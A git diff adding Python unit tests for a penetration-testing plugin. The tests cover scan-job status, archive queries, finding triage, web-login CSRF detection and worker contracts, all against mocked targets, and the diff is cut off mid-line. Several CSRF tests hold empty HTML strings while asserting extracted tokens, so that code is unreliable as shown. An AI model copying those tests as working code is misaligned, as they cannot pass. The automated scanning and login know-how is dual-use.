+ plugin.scan_jobs = {} + plugin._get_job_status = lambda job_id: Plugin._get_job_status(plugin, job_id) + plugin.time.return_value = 100.0 + plugin.chainstore_hget.return_value = { + "job_id": "job-1", + "job_status": "RUNNING", + "job_pass": 1, + "target": "example.com", + "workers": { + "worker-A": {"start_port": 1, "end_port": 10, "finished": True, "assignment_revision": 1}, + "worker-B": {"start_port": 11, "end_port": 20, "finished": False, "assignment_revision": 1}, + }, + } + plugin.chainstore_hgetall.side_effect = lambda hkey: ( + { + "job-1:worker-A": { + "job_id": "job-1", + "worker_addr": "worker-A", + "pass_nr": 1, + "assignment_revision_seen": 1, + "progress": 100.0, + "phase": "done", + "ports_scanned": 10, + "ports_total": 10, + "open_ports_found": [], + "completed_tests": [], + "updated_at": 100.0, + "started_at": 90.0, + "first_seen_live_at": 90.0, + "last_seen_at": 100.0, + "finished": True, + }, + } if hkey == "test-instance:live" else {"job-1": plugin.chainstore_hget.return_value} + ) + + result = Plugin.get_job_status(plugin, job_id="job-1") + + self.assertEqual(result["status"], "network_tracked") + self.assertEqual(result["workers"]["worker-B"]["worker_state"], "unseen") + + def test_get_job_data_includes_reconciled_workers(self): + """get_job_data includes reconciled worker state for active jobs.""" + Plugin = self._get_plugin_class() + running = self._build_running_job("run-job", pass_count=2) + plugin = self._build_plugin({"run-job": running}) + plugin.time.return_value = 100.0 + plugin.chainstore_hgetall.side_effect = lambda hkey: ( + { + "run-job:worker-A": { + "job_id": "run-job", + "worker_addr": "worker-A", + "pass_nr": running["job_pass"], + "assignment_revision_seen": 1, + "progress": 50, + "phase": "service_probes", + "ports_scanned": 50, + "ports_total": 100, + "open_ports_found": [], + "completed_tests": [], + "updated_at": 100.0, + "started_at": 90.0, + "first_seen_live_at": 90.0, + "last_seen_at": 100.0, + }, + } if hkey == "test-instance:live" else {"run-job": running} + ) + + result = Plugin.get_job_data(plugin, job_id="run-job") + + self.assertIn("workers_reconciled", result["job"]) + self.assertEqual(result["job"]["workers_reconciled"]["worker-A"]["worker_state"], "active") + + def test_get_job_archive_not_found(self): + """get_job_archive for non-existent job returns not_found.""" + Plugin = self._get_plugin_class() + plugin = self._build_plugin({}) + + result = Plugin.get_job_archive(plugin, job_id="missing-job") + self.assertEqual(result["error"], "not_found") + + def test_get_job_archive_r1fs_failure(self): + """get_job_archive when R1FS fails returns fetch_failed.""" + Plugin = self._get_plugin_class() + stub = self._build_finalized_stub("fin-job") + plugin = self._build_plugin({"fin-job": stub}) + plugin.r1fs.get_json.return_value = None + + result = Plugin.get_job_archive(plugin, job_id="fin-job") + self.assertEqual(result["error"], "fetch_failed") + + def test_get_analysis_finalized_reads_archive(self): + """Finalized jobs resolve stored LLM analysis from archive passes after CStore pruning.""" + Plugin = self._get_plugin_class() + stub = self._build_finalized_stub("fin-job") + plugin = self._build_plugin({"fin-job": stub}) + plugin.r1fs.get_json.return_value = { + "archive_version": JOB_ARCHIVE_VERSION, + "job_id": "fin-job", + "passes": [ + { + "pass_nr": 1, + "date_completed": 10.0, + "report_cid": "QmPass1", + "llm_analysis": "Archive-backed analysis", + "quick_summary": "Archive-backed summary", + "worker_reports": {"node-A": {}, "node-B": {}}, + }, + ], + "ui_aggregate": {}, + "job_config": {"target": "10.0.0.1"}, + "timeline": [], + "duration": 0, + "date_created": 0, + "date_completed": 0, + } + + result = Plugin.get_analysis(plugin, job_id="fin-job") + + self.assertEqual(result["job_id"], "fin-job") + self.assertEqual(result["analysis"], "Archive-backed analysis") + self.assertEqual(result["quick_summary"], "Archive-backed summary") + self.assertEqual(result["num_workers"], 2) + self.assertEqual(result["total_passes"], 1) + + def test_get_analysis_finalized_reports_llm_failed_from_archive(self): + """Finalized archive reads surface llm_failed instead of pretending pass history is missing.""" + Plugin = self._get_plugin_class() + stub = self._build_finalized_stub("fin-job") + plugin = self._build_plugin({"fin-job": stub}) + plugin.r1fs.get_json.return_value = { + "archive_version": JOB_ARCHIVE_VERSION, + "job_id": "fin-job", + "passes": [ + { + "pass_nr": 1, + "date_completed": 10.0, + "report_cid": "QmPass1", + "llm_failed": True, + "quick_summary": None, + "worker_reports": {"node-A": {}}, + }, + ], + "ui_aggregate": {}, + "job_config": {"target": "10.0.0.1"}, + "timeline": [], + "duration": 0, + "date_created": 0, + "date_completed": 0, + } + + result = Plugin.get_analysis(plugin, job_id="fin-job") + + self.assertEqual(result["error"], "No LLM analysis available for this pass") + self.assertTrue(result["llm_failed"]) + self.assertEqual(result["pass_nr"], 1) + + def test_get_analysis_finalized_archive_integrity_error_bubbles_up(self): + """Archive integrity failures should be returned instead of falling back to pruned CStore state.""" + Plugin = self._get_plugin_class() + stub = self._build_finalized_stub("fin-job") + plugin = self._build_plugin({"fin-job": stub}) + plugin.r1fs.get_json.return_value = { + "archive_version": JOB_ARCHIVE_VERSION, + "job_id": "other-job", + "passes": [], + "ui_aggregate": {}, + "job_config": {}, + "timeline": [], + "duration": 0, + "date_created": 0, + "date_completed": 0, + } + + result = Plugin.get_analysis(plugin, job_id="fin-job") + + self.assertEqual(result["error"], "integrity_mismatch") + self.assertEqual(result["job_id"], "fin-job") + + def test_get_job_archive_summary_only(self): + """Summary mode returns bounded pass-history summaries instead of full pass payloads.""" + Plugin = self._get_plugin_class() + stub = self._build_finalized_stub("fin-job") + plugin = self._build_plugin({"fin-job": stub}) + plugin.r1fs.get_json.return_value = { + "archive_version": JOB_ARCHIVE_VERSION, + "job_id": "fin-job", + "passes": [ + { + "pass_nr": 1, + "date_started": 1.0, + "date_completed": 2.0, + "duration": 1.0, + "risk_score": 10, + "quick_summary": "pass 1", + "aggregated_report_cid": "QmAgg1", + "worker_reports": {"node-A": {}}, + "findings": [{"finding_id": "f-1"}], + }, + { + "pass_nr": 2, + "date_started": 2.0, + "date_completed": 3.0, + "duration": 1.0, + "risk_score": 12, + "quick_summary": "pass 2", + "aggregated_report_cid": "QmAgg2", + "worker_reports": {"node-A": {}, "node-B": {}}, + "findings": [{"finding_id": "f-2"}, {"finding_id": "f-3"}], + }, + ], + "ui_aggregate": {}, + "job_config": {}, + "timeline": [], + "duration": 0, + "date_created": 0, + "date_completed": 0, + } + + result = Plugin.get_job_archive(plugin, job_id="fin-job", summary_only=True, pass_limit=1) + + self.assertEqual(result["archive"]["archive_query"]["returned_passes"], 1) + self.assertTrue(result["archive"]["archive_query"]["summary_only"]) + self.assertEqual(result["archive"]["passes"][0]["findings_count"], 1) + self.assertNotIn("findings", result["archive"]["passes"][0]) + + def test_get_job_archive_paginated_passes(self): + """Archive queries can page pass history without dropping the rest of the archive contract.""" + Plugin = self._get_plugin_class() + stub = self._build_finalized_stub("fin-job") + plugin = self._build_plugin({"fin-job": stub}) + plugin.r1fs.get_json.return_value = { + "archive_version": JOB_ARCHIVE_VERSION, + "job_id": "fin-job", + "passes": [{"pass_nr": 1}, {"pass_nr": 2}, {"pass_nr": 3}], + "ui_aggregate": {}, + "job_config": {}, + "timeline": [], + "duration": 0, + "date_created": 0, + "date_completed": 0, + } + + result = Plugin.get_job_archive(plugin, job_id="fin-job", pass_offset=1, pass_limit=1) + + self.assertEqual([p["pass_nr"] for p in result["archive"]["passes"]], [2]) + self.assertTrue(result["archive"]["archive_query"]["truncated"]) + + def test_update_finding_triage_persists_mutable_state(self): + """Analyst triage updates stay outside archive storage and append audit history.""" + Plugin = self._get_plugin_class() + stub = self._build_finalized_stub("fin-job") + plugin = self._build_plugin({"fin-job": stub}) + plugin.r1fs.get_json.return_value = { + "archive_version": JOB_ARCHIVE_VERSION, + "job_id": "fin-job", + "passes": [{"findings": [{"finding_id": "f-1", "title": "Issue"}]}], + "ui_aggregate": {}, + "job_config": {}, + "timeline": [], + "duration": 0, + "date_created": 0, + "date_completed": 0, + } + plugin.time.return_value = 123.0 + plugin._log_audit_event = MagicMock() + triage_store = {} + triage_audit_store = {} + + def _chainstore_hget(hkey, key): + if hkey.endswith(":triage"): + return triage_store.get(key) + if hkey.endswith(":triage:audit"): + return triage_audit_store.get(key) + return {"fin-job": stub}.get(key) + + def _chainstore_hgetall(hkey): + if hkey.endswith(":triage"): + return dict(triage_store) + if hkey.endswith(":triage:audit"): + return dict(triage_audit_store) + return {"fin-job": stub} + + def _chainstore_hset(hkey, key, value): + if hkey.endswith(":triage"): + triage_store[key] = value + elif hkey.endswith(":triage:audit"): + triage_audit_store[key] = value + + plugin.chainstore_hget.side_effect = _chainstore_hget + plugin.chainstore_hgetall.side_effect = _chainstore_hgetall + plugin.chainstore_hset.side_effect = _chainstore_hset + + result = Plugin.update_finding_triage( + plugin, + job_id="fin-job", + finding_id="f-1", + status="accepted_risk", + note="Approved by analyst", + actor="alice", + review_at=456.0, + ) + + self.assertEqual(result["triage"]["status"], "accepted_risk") + self.assertEqual(result["audit"][-1]["actor"], "alice") + self.assertEqual(triage_store["fin-job:f-1"]["review_at"], 456.0) + plugin._log_audit_event.assert_called_once() + + def test_get_job_triage_not_found(self): + """Triage query returns found=False when no mutable state exists yet.""" + Plugin = self._get_plugin_class() + stub = self._build_finalized_stub("fin-job") + plugin = self._build_plugin({"fin-job": stub}) + plugin.chainstore_hgetall.side_effect = [ + {"fin-job": stub}, + {}, + ] + plugin.chainstore_hget.side_effect = [ + [], + ] + + result = Plugin.get_job_triage(plugin, job_id="fin-job", finding_id="missing") + + self.assertFalse(result["found"]) + self.assertEqual(result["audit"], []) + + +class TestPhase2AuditCounting(unittest.TestCase): + """Phase 2: audit counts include graybox findings.""" + + @classmethod + def _mock_plugin_modules(cls): + if 'extensions.business.cybersec.red_mesh.pentester_api_01' in sys.modules: + return + mock_plugin_modules() + + def _get_plugin_class(self): + self._mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + return PentesterApi01Plugin + + def test_close_job_audit_counts_graybox_findings(self): + """_close_job audit nr_findings includes graybox results.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.ee_addr = "node-A" + plugin.cfg_instance_id = "test-instance" + plugin.global_shmem = {} + plugin.log.get_localhost_ip.return_value = "127.0.0.1" + plugin.P = MagicMock() + plugin.json_dumps.return_value = "{}" + plugin.r1fs.add_json.return_value = "QmWorkerReport" + plugin._get_job_config = MagicMock(return_value={"redact_credentials": False}) + plugin._redact_report = MagicMock(side_effect=lambda r: r) + plugin._normalize_job_record = MagicMock(side_effect=lambda job_id, raw: (job_id, raw)) + plugin._log_audit_event = MagicMock() + plugin._count_nested_findings = lambda section: Plugin._count_nested_findings(section) + plugin._count_all_findings = lambda report: Plugin._count_all_findings(plugin, report) + + report = { + "start_port": 443, + "end_port": 443, + "ports_scanned": 1, + "open_ports": [443], + "service_info": { + "443": {"_service_info_https": {"findings": [{"title": "svc"}]}}, + }, + "web_tests_info": { + "443": {"_web_test_xss": {"findings": [{"title": "web"}]}}, + }, + "correlation_findings": [{"title": "corr"}], + "graybox_results": { + "443": {"_graybox_test": {"findings": [{"scenario_id": "S1"}, {"scenario_id": "S2"}]}}, + }, + } + + worker = MagicMock() + worker.get_status.return_value = report + plugin.scan_jobs = {"job-1": {"local-1": worker}} + plugin._get_aggregated_report = MagicMock(return_value=report) + + job_specs = { + "job_id": "job-1", + "target": "example.com", + "workers": {"node-A": {"start_port": 443, "end_port": 443}}, + "job_config_cid": "QmConfig", + } + plugin.chainstore_hget.return_value = job_specs + plugin.chainstore_hset = MagicMock() + + Plugin._close_job(plugin, "job-1") + + plugin._log_audit_event.assert_called_once() + event_type, details = plugin._log_audit_event.call_args[0] + self.assertEqual(event_type, "scan_completed") + self.assertEqual(details["nr_findings"], 5) diff --git a/extensions/business/cybersec/red_mesh/tests/test_auth.py b/extensions/business/cybersec/red_mesh/tests/test_auth.py new file mode 100644 index 00000000..7ca8abcf --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/test_auth.py @@ -0,0 +1,329 @@ +"""Tests for AuthManager.""" + +import time +import unittest +from unittest.mock import MagicMock, patch, PropertyMock + +from extensions.business.cybersec.red_mesh.graybox.auth import AuthManager +from extensions.business.cybersec.red_mesh.graybox.models.target_config import GrayboxTargetConfig +from extensions.business.cybersec.red_mesh.constants import GRAYBOX_SESSION_MAX_AGE + + +def _make_auth(**overrides): + """Build an AuthManager with defaults.""" + defaults = dict( + target_url="http://testapp.local:8000", + target_config=GrayboxTargetConfig(), + verify_tls=False, + ) + defaults.update(overrides) + return AuthManager(**defaults) + + +def _mock_response(status=200, text="", url="http://testapp.local:8000/dashboard/", + history=None, cookies=None, content_type="text/html"): + """Build a mock requests.Response.""" + resp = MagicMock() + resp.status_code = status + resp.text = text + resp.url = url + resp.history = history or [] + resp.headers = {"content-type": content_type} + resp.json.return_value = {} + if cookies is not None: + resp.cookies = cookies + return resp + + +class TestCsrfAutoDetect(unittest.TestCase): + + def test_csrf_autodetect_django(self): + """Finds Django csrfmiddlewaretoken.""" + auth = _make_auth() + html = '' + field, token = auth._extract_csrf(html) + self.assertEqual(field, "csrfmiddlewaretoken") + self.assertEqual(token, "abc123") + + def test_csrf_autodetect_flask(self): + """Finds Flask/WTForms csrf_token.""" + auth = _make_auth() + html = '' + field, token = auth._extract_csrf(html) + self.assertEqual(field, "csrf_token") + self.assertEqual(token, "flask-token-xyz") + + def test_csrf_autodetect_rails(self): + """Finds Rails authenticity_token.""" + auth = _make_auth() + html = '' + field, token = auth._extract_csrf(html) + self.assertEqual(field, "authenticity_token") + self.assertEqual(token, "rails-tok") + + def test_csrf_autodetect_fallback(self): + """Fallback finds generic hidden input with 'csrf' in name.""" + auth = _make_auth() + html = '' + field, token = auth._extract_csrf(html) + self.assertEqual(field, "my_csrf_thing") + self.assertEqual(token, "custom-tok") + + def test_csrf_configured_override(self): + """Configured csrf_field overrides auto-detection.""" + cfg = GrayboxTargetConfig(csrf_field="custom_token") + auth = _make_auth(target_config=cfg) + html = '' + field, token = auth._extract_csrf(html) + self.assertEqual(field, "custom_token") + self.assertEqual(token, "override-val") + + def test_csrf_field_property(self): + """detected_csrf_field is exposed as a property.""" + auth = _make_auth() + self.assertIsNone(auth.detected_csrf_field) + html = '' + auth._extract_csrf(html) + self.assertEqual(auth.detected_csrf_field, "csrf_token") + + def test_csrf_none_when_missing(self): + """Returns (None, None) when no CSRF field found.""" + auth = _make_auth() + field, token = auth._extract_csrf("
    ") + self.assertIsNone(field) + self.assertIsNone(token) + + def test_extract_csrf_value_public_api(self): + """Static extract_csrf_value works for probes.""" + html = '' + val = AuthManager.extract_csrf_value(html, "csrf_token") + self.assertEqual(val, "pub-tok") + + +class TestLoginSuccessDetection(unittest.TestCase): + + def _check(self, auth, response, cookies=None): + """Helper to call _is_login_success with a mock session.""" + session = MagicMock() + session.cookies.get_dict.return_value = cookies or {} + return auth._is_login_success(response, session, "http://testapp.local:8000/auth/login/") + + def test_login_success_redirect_with_cookies(self): + """Redirect away from login + cookies -> success.""" + auth = _make_auth() + resp = _mock_response(url="http://testapp.local:8000/dashboard/", history=[MagicMock()]) + self.assertTrue(self._check(auth, resp, cookies={"sessionid": "abc"})) + + def test_login_redirect_no_cookies(self): + """Redirect without cookies -> failure.""" + auth = _make_auth() + resp = _mock_response(url="http://testapp.local:8000/dashboard/", history=[MagicMock()]) + self.assertFalse(self._check(auth, resp, cookies={})) + + def test_login_success_spa(self): + """No redirect, cookies set -> success (SPA login).""" + auth = _make_auth() + resp = _mock_response(url="http://testapp.local:8000/auth/login/") + self.assertTrue(self._check(auth, resp, cookies={"token": "jwt-val"})) + + def test_login_failure_multiword(self): + """'login failed' in body -> failure.""" + auth = _make_auth() + resp = _mock_response(text="

    Login failed. Please try again.

    ") + self.assertFalse(self._check(auth, resp, cookies={"sessionid": "x"})) + + def test_login_no_false_negative(self): + """Page with 'failed' in dashboard text (not a failure marker) -> success if cookies set.""" + auth = _make_auth() + resp = _mock_response( + url="http://testapp.local:8000/dashboard/", + text="

    3 failed login attempts detected on your account.

    ", + history=[MagicMock()], + ) + self.assertTrue(self._check(auth, resp, cookies={"sessionid": "x"})) + + def test_login_failure_json_error(self): + """JSON {"error": "bad creds"} -> failure.""" + auth = _make_auth() + resp = _mock_response( + url="http://testapp.local:8000/auth/login/", + content_type="application/json", + ) + resp.json.return_value = {"error": "bad credentials"} + self.assertFalse(self._check(auth, resp, cookies={})) + + def test_login_failure_json_success_false(self): + """JSON {"success": false} -> failure.""" + auth = _make_auth() + resp = _mock_response( + url="http://testapp.local:8000/auth/login/", + content_type="application/json", + ) + resp.json.return_value = {"success": False} + self.assertFalse(self._check(auth, resp, cookies={})) + + def test_login_success_json(self): + """JSON {"authenticated": true} + cookies -> success.""" + auth = _make_auth() + resp = _mock_response( + url="http://testapp.local:8000/auth/login/", + content_type="application/json", + ) + resp.json.return_value = {"authenticated": True} + self.assertTrue(self._check(auth, resp, cookies={"token": "jwt"})) + + def test_login_failure_status(self): + """401 -> failure.""" + auth = _make_auth() + resp = _mock_response(status=401) + self.assertFalse(self._check(auth, resp, cookies={"sessionid": "x"})) + + +class TestAuthManagerLifecycle(unittest.TestCase): + + @patch("extensions.business.cybersec.red_mesh.graybox.auth.requests") + def test_try_credentials_public(self, mock_requests): + """try_credentials returns session on success, None on failure.""" + auth = _make_auth() + # Mock login flow: GET returns CSRF, POST redirects with cookies + mock_session = MagicMock() + mock_session.get.return_value = _mock_response( + text='' + ) + post_resp = _mock_response( + url="http://testapp.local:8000/dashboard/", + history=[MagicMock()], + ) + mock_session.post.return_value = post_resp + mock_session.cookies.get_dict.return_value = {"sessionid": "abc"} + mock_requests.Session.return_value = mock_session + + result = auth.try_credentials("admin", "pass") + self.assertIsNotNone(result) + + @patch("extensions.business.cybersec.red_mesh.graybox.auth.requests") + def test_make_anonymous_session(self, mock_requests): + """make_anonymous_session returns a fresh session.""" + auth = _make_auth() + session = auth.make_anonymous_session() + self.assertIsNotNone(session) + + def test_session_expiry(self): + """is_expired returns True after GRAYBOX_SESSION_MAX_AGE.""" + auth = _make_auth() + auth._created_at = time.time() - GRAYBOX_SESSION_MAX_AGE - 1 + self.assertTrue(auth.is_expired) + + def test_session_not_expired(self): + """is_expired returns False for fresh session.""" + auth = _make_auth() + auth._created_at = time.time() + self.assertFalse(auth.is_expired) + + def test_auth_state_reflects_session_status(self): + """auth_state exposes a typed snapshot of current session state.""" + auth = _make_auth() + auth.official_session = MagicMock() + auth.regular_session = None + auth._auth_errors = ["official_login_failed"] + auth._refresh_count = 2 + + state = auth.auth_state + + self.assertTrue(state.official_authenticated) + self.assertFalse(state.regular_authenticated) + self.assertEqual(state.refresh_count, 2) + self.assertEqual(state.auth_errors, ("official_login_failed",)) + + def test_cleanup_closes_sessions(self): + """cleanup() closes all sessions.""" + auth = _make_auth() + auth.official_session = MagicMock() + auth.regular_session = MagicMock() + auth.anon_session = MagicMock() + auth._created_at = time.time() + auth.cleanup() + auth.official_session is None # already set to None + auth.regular_session is None + auth.anon_session is None + self.assertEqual(auth._created_at, 0.0) + + def test_ensure_sessions_failed_refresh_clears_stale_sessions(self): + """Failed refresh tears down stale sessions instead of leaving mixed state.""" + auth = _make_auth() + auth.official_session = MagicMock() + auth.regular_session = MagicMock() + auth._created_at = time.time() - GRAYBOX_SESSION_MAX_AGE - 1 + + with patch.object(auth, "authenticate", return_value=False) as mock_auth: + result = auth.ensure_sessions({"username": "admin", "password": "secret"}) + + self.assertFalse(result) + self.assertIsNone(auth.official_session) + self.assertIsNone(auth.regular_session) + self.assertEqual(auth.auth_state.refresh_count, 1) + mock_auth.assert_called_once() + + @patch("extensions.business.cybersec.red_mesh.graybox.auth.requests") + @patch("extensions.business.cybersec.red_mesh.graybox.auth.time.sleep") + def test_authenticate_retries_transient_transport_error(self, mock_sleep, mock_requests): + """Transient transport failures retry once before giving up.""" + import requests as real_requests + + auth = _make_auth() + first_session = MagicMock() + second_session = MagicMock() + first_session.get.side_effect = real_requests.ConnectionError("temporary failure") + second_session.get.return_value = _mock_response( + text='' + ) + second_session.post.return_value = _mock_response( + url="http://testapp.local:8000/dashboard/", + history=[MagicMock()], + ) + second_session.cookies.get_dict.return_value = {"sessionid": "abc"} + mock_requests.Session.side_effect = [MagicMock(), first_session, second_session] + mock_requests.RequestException = real_requests.RequestException + + result = auth.authenticate({"username": "admin", "password": "secret"}) + + self.assertTrue(result) + self.assertIs(auth.official_session, second_session) + mock_sleep.assert_called_once() + self.assertEqual(auth._auth_errors, []) + + @patch("extensions.business.cybersec.red_mesh.graybox.auth.requests") + def test_preflight_unreachable(self, mock_requests): + """preflight_check returns error for unreachable target.""" + import requests as real_requests + mock_requests.head.side_effect = real_requests.ConnectionError("refused") + mock_requests.RequestException = real_requests.RequestException + auth = _make_auth() + err = auth.preflight_check() + self.assertIsNotNone(err) + self.assertIn("unreachable", err.lower()) + + @patch("extensions.business.cybersec.red_mesh.graybox.auth.requests") + def test_preflight_login_404(self, mock_requests): + """preflight_check returns error if login page returns 404.""" + mock_requests.head.return_value = _mock_response(status=200) + mock_requests.get.return_value = _mock_response(status=404) + mock_requests.RequestException = Exception + auth = _make_auth() + err = auth.preflight_check() + self.assertIsNotNone(err) + self.assertIn("404", err) + + @patch("extensions.business.cybersec.red_mesh.graybox.auth.requests") + def test_preflight_ok(self, mock_requests): + """preflight_check returns None when target and login page are reachable.""" + mock_requests.head.return_value = _mock_response(status=200) + mock_requests.get.return_value = _mock_response(status=200) + mock_requests.RequestException = Exception + auth = _make_auth() + err = auth.preflight_check() + self.assertIsNone(err) + + +if __name__ == '__main__': + unittest.main() diff --git a/extensions/business/cybersec/red_mesh/tests/test_base_worker.py b/extensions/business/cybersec/red_mesh/tests/test_base_worker.py new file mode 100644 index 00000000..79fb41ab --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/test_base_worker.py @@ -0,0 +1,253 @@ +""" +Contract enforcement tests for BaseLocalWorker. + +Verifies the abstract base class contract is correctly implemented +and that PentestLocalWorker's retrofit preserves all API-facing behavior. +""" + +import threading +import unittest +from unittest.mock import MagicMock + +from extensions.business.cybersec.red_mesh.worker.base import BaseLocalWorker +from extensions.business.cybersec.red_mesh.worker import PentestLocalWorker +from .conftest import DummyOwner + + +def _make_pentest_worker(**overrides): + """Helper: create a PentestLocalWorker with sensible defaults.""" + defaults = dict( + owner=DummyOwner(), + target="127.0.0.1", + job_id="test-job", + initiator="test-addr", + local_id_prefix="1", + worker_target_ports=[80, 443], + ) + defaults.update(overrides) + return PentestLocalWorker(**defaults) + + +class TestBaseLocalWorkerContract(unittest.TestCase): + """Verify BaseLocalWorker enforces the API contract.""" + + # ── Abstract method enforcement ── + + def test_cannot_instantiate_base(self): + """BaseLocalWorker is abstract — cannot be instantiated directly.""" + with self.assertRaises(TypeError): + BaseLocalWorker( + owner=MagicMock(), job_id="test", initiator="addr", + local_id_prefix="1", target="127.0.0.1", + ) + + # ── Shared attribute initialization ── + + def test_pentest_worker_is_base_worker(self): + """PentestLocalWorker inherits from BaseLocalWorker.""" + self.assertTrue(issubclass(PentestLocalWorker, BaseLocalWorker)) + + def test_shared_attributes_set(self): + """Base __init__ sets all shared attributes.""" + owner = DummyOwner() + worker = PentestLocalWorker( + owner=owner, target="127.0.0.1", job_id="j1", + initiator="addr", local_id_prefix="1", + worker_target_ports=[80, 443], + ) + self.assertIs(worker.owner, owner) + self.assertEqual(worker.job_id, "j1") + self.assertEqual(worker.initiator, "addr") + self.assertEqual(worker.target, "127.0.0.1") + self.assertTrue(worker.local_worker_id.startswith("RM-1-")) + self.assertIsNone(worker.thread) # set by start() + self.assertIsNone(worker.stop_event) # set by start() + self.assertTrue(hasattr(worker, 'metrics')) + self.assertTrue(hasattr(worker, 'initial_ports')) + self.assertTrue(hasattr(worker, 'state')) + + # ── Threading contract ── + + def test_start_creates_thread_and_event(self): + """start() sets thread and stop_event.""" + worker = _make_pentest_worker() + worker.execute_job = lambda: None + worker.start() + self.assertIsInstance(worker.thread, threading.Thread) + self.assertIsInstance(worker.stop_event, threading.Event) + worker.thread.join(timeout=2) + + def test_stop_sets_event_and_canceled(self): + """stop() sets the stop_event AND state['canceled'].""" + worker = _make_pentest_worker() + worker.execute_job = lambda: None + worker.start() + worker.stop() + self.assertTrue(worker.stop_event.is_set()) + self.assertTrue(worker.state["canceled"]) + worker.thread.join(timeout=2) + + def test_check_stopped_after_stop(self): + """_check_stopped() returns True after stop_event is set.""" + worker = _make_pentest_worker() + worker.stop_event = threading.Event() + worker.state["done"] = False + self.assertFalse(worker._check_stopped()) + worker.stop_event.set() + self.assertTrue(worker._check_stopped()) + + def test_check_stopped_when_done(self): + """_check_stopped() returns True when state['done'] is True.""" + worker = _make_pentest_worker() + worker.stop_event = threading.Event() + worker.state["done"] = True + self.assertTrue(worker._check_stopped()) + + def test_check_stopped_when_canceled(self): + """_check_stopped() returns True when state['canceled'] is True.""" + worker = _make_pentest_worker() + worker.stop_event = threading.Event() + worker.state["canceled"] = True + self.assertTrue(worker._check_stopped()) + + def test_check_stopped_before_start(self): + """_check_stopped() works even before start() (stop_event is None).""" + worker = _make_pentest_worker() + self.assertIsNone(worker.stop_event) + self.assertFalse(worker._check_stopped()) + + # ── State dict contract ── + + def test_state_has_required_keys(self): + """State dict has all keys the API reads.""" + worker = _make_pentest_worker() + required_keys = [ + "done", "canceled", "open_ports", "ports_scanned", + "completed_tests", "service_info", "web_tests_info", + "port_protocols", "correlation_findings", + ] + for key in required_keys: + self.assertIn(key, worker.state, f"Missing state key: {key}") + + def test_ports_scanned_is_list(self): + """ports_scanned must be a list (API calls len() on it).""" + worker = _make_pentest_worker() + self.assertIsInstance(worker.state["ports_scanned"], list) + + def test_open_ports_is_list(self): + """open_ports must be a list (API calls set.update() on it).""" + worker = _make_pentest_worker() + self.assertIsInstance(worker.state["open_ports"], list) + + def test_done_defaults_false(self): + self.assertFalse(_make_pentest_worker().state["done"]) + + def test_canceled_defaults_false(self): + self.assertFalse(_make_pentest_worker().state["canceled"]) + + # ── initial_ports contract ── + + def test_initial_ports_is_list(self): + """initial_ports must be a list (API calls len() on it).""" + worker = _make_pentest_worker() + self.assertIsInstance(worker.initial_ports, list) + self.assertGreater(len(worker.initial_ports), 0) + + # ── local_worker_id contract ── + + def test_local_worker_id_is_string(self): + worker = _make_pentest_worker() + self.assertIsInstance(worker.local_worker_id, str) + self.assertTrue(worker.local_worker_id.startswith("RM-")) + + # ── get_status contract ── + + def test_get_status_returns_dict(self): + worker = _make_pentest_worker() + status = worker.get_status() + self.assertIsInstance(status, dict) + + def test_get_status_has_required_keys(self): + """get_status() returns all keys needed by _close_job.""" + worker = _make_pentest_worker() + status = worker.get_status() + required = [ + "job_id", "initiator", "target", + "open_ports", "ports_scanned", "completed_tests", + "service_info", "web_tests_info", "port_protocols", + "correlation_findings", "scan_metrics", + ] + for key in required: + self.assertIn(key, status, f"Missing status key: {key}") + + def test_get_status_scan_metrics_is_dict(self): + worker = _make_pentest_worker() + status = worker.get_status() + self.assertIsInstance(status["scan_metrics"], dict) + + # ── get_worker_specific_result_fields contract ── + + def test_result_fields_is_static(self): + """get_worker_specific_result_fields is a static method returning dict.""" + fields = PentestLocalWorker.get_worker_specific_result_fields() + self.assertIsInstance(fields, dict) + + def test_result_fields_has_core_keys(self): + """Aggregation fields include the keys the API expects.""" + fields = PentestLocalWorker.get_worker_specific_result_fields() + required = [ + "open_ports", "service_info", "web_tests_info", + "completed_tests", "port_protocols", "correlation_findings", + "scan_metrics", + ] + for key in required: + self.assertIn(key, fields, f"Missing aggregation field: {key}") + + # ── P() logging ── + + def test_p_delegates_to_owner(self): + owner = DummyOwner() + worker = PentestLocalWorker( + owner=owner, target="t", job_id="j", + initiator="a", local_id_prefix="1", + worker_target_ports=[80], + ) + worker.P("test message") + self.assertTrue(len(owner.messages) > 0) + # Find the "test message" log entry (init also logs) + matching = [m for m in owner.messages if "test message" in m] + self.assertTrue(len(matching) > 0, "P() did not delegate to owner") + self.assertIn(worker.local_worker_id, matching[0]) + + +class TestPentestWorkerRetrofit(unittest.TestCase): + """Verify PentestLocalWorker still works after BaseLocalWorker retrofit.""" + + def test_mro_has_base(self): + """BaseLocalWorker is in the MRO.""" + self.assertIn(BaseLocalWorker, PentestLocalWorker.__mro__) + + def test_start_stop_inherited(self): + """start() and stop() come from BaseLocalWorker, not redefined.""" + self.assertNotIn('start', PentestLocalWorker.__dict__) + self.assertNotIn('stop', PentestLocalWorker.__dict__) + + def test_check_stopped_inherited(self): + self.assertNotIn('_check_stopped', PentestLocalWorker.__dict__) + + def test_p_inherited(self): + self.assertNotIn('P', PentestLocalWorker.__dict__) + + def test_execute_job_overridden(self): + """execute_job is defined on PentestLocalWorker (not inherited).""" + self.assertIn('execute_job', PentestLocalWorker.__dict__) + + def test_get_status_overridden(self): + self.assertIn('get_status', PentestLocalWorker.__dict__) + + def test_get_worker_specific_result_fields_overridden(self): + self.assertIn('get_worker_specific_result_fields', PentestLocalWorker.__dict__) + + +if __name__ == '__main__': + unittest.main() diff --git a/extensions/business/cybersec/red_mesh/tests/test_contracts.py b/extensions/business/cybersec/red_mesh/tests/test_contracts.py new file mode 100644 index 00000000..0c6d031a --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/test_contracts.py @@ -0,0 +1,108 @@ +import json +import unittest + +from extensions.business.cybersec.red_mesh.findings import Finding, Severity, probe_result +from extensions.business.cybersec.red_mesh.graybox.findings import GrayboxFinding +from extensions.business.cybersec.red_mesh.mixins.report import _ReportMixin +from extensions.business.cybersec.red_mesh.models.archive import JobArchive + + +class _ReportHost(_ReportMixin): + def P(self, *_args, **_kwargs): + return None + + def json_dumps(self, payload, **kwargs): + return json.dumps(payload, **kwargs) + + +class TestArchiveContracts(unittest.TestCase): + + def test_archive_roundtrip_preserves_version(self): + archive = JobArchive( + archive_version=1, + job_id="job-1", + job_config={"target": 